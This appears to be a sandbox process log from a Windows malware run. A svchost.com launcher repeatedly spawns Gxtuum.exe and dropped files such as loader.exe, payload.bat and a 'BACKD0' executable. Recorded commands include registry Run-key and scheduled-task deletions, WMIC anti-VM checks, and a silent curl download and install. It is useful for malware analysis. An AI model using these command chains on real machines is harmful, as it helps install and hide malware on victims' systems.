"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe"
C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe
C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE
C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE
C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"
C:\Users\Admin\AppData\Local\Temp\2578412766.exe
C:\Users\Admin\AppData\Local\Temp\2578412766.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE
C:\Users\Admin\AppData\Local\Temp\513022960.exe
C:\Users\Admin\AppData\Local\Temp\513022960.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn Windows Upgrade Manager
C:\Users\Admin\AppData\Local\Temp\287511317.exe
C:\Users\Admin\AppData\Local\Temp\287511317.exe
C:\Users\Admin\AppData\Local\Temp\154057176.exe
C:\Users\Admin\AppData\Local\Temp\154057176.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "payload.bat"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_PointingDevice get PNPDeviceID /value
C:\Windows\system32\find.exe
find "PNPDeviceID"
C:\Windows\system32\curl.exe
curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\520429473.exe
C:\Users\Admin\AppData\Local\Temp\520429473.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3980 -ip 3980
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 332
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe
"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe
"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 3244
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
